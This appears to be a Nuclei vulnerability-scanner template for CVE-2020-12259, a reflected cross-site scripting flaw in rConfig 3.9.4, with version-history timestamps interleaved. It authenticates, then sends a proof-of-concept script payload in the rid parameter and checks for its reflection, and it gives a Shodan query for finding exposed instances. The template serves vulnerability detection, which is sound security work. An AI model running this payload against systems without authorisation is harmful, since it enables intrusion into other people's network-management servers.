2023-10-17 07:20:28 +00:00
id : CVE-2020-12259
2023-10-17 17:52:26 +00:00
2023-10-17 07:20:28 +00:00
info :
name : rConfig 3.9.4 - Cross-Site Scripting
author : r3Y3r53
severity : medium
description : |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference :
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
2023-10-17 07:20:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2020-12259
cwe-id : CWE-79
2023-10-18 16:26:30 +00:00
epss-score : 0.16256
2024-03-23 09:28:19 +00:00
epss-percentile : 0.95859
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : "true"
2023-10-17 17:52:26 +00:00
max-request : 3
vendor : rconfig
product : rconfig
2023-10-17 07:20:28 +00:00
shodan-query : http.title:"rConfig"
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,rconfig,authenticated,xss
2023-10-17 07:20:28 +00:00
http :
- raw :
- |
GET /login.php HTTP/1.1
Host : {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host : {{Hostname}}
host-redirects : true
matchers :
- type : dsl
dsl :
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition : and
2024-01-26 08:31:11 +00:00
# digest: 490a00463044022051d2fe359680cb5c44af86c136ee84fbe8d0e3386c1341ebf575b33ecb98d40202202fef62e29023201c7868f4e215d76f9c1fea4946b1b7a2c9b13dcc115ab16210:922c64590222798bb761d5b6d8e72950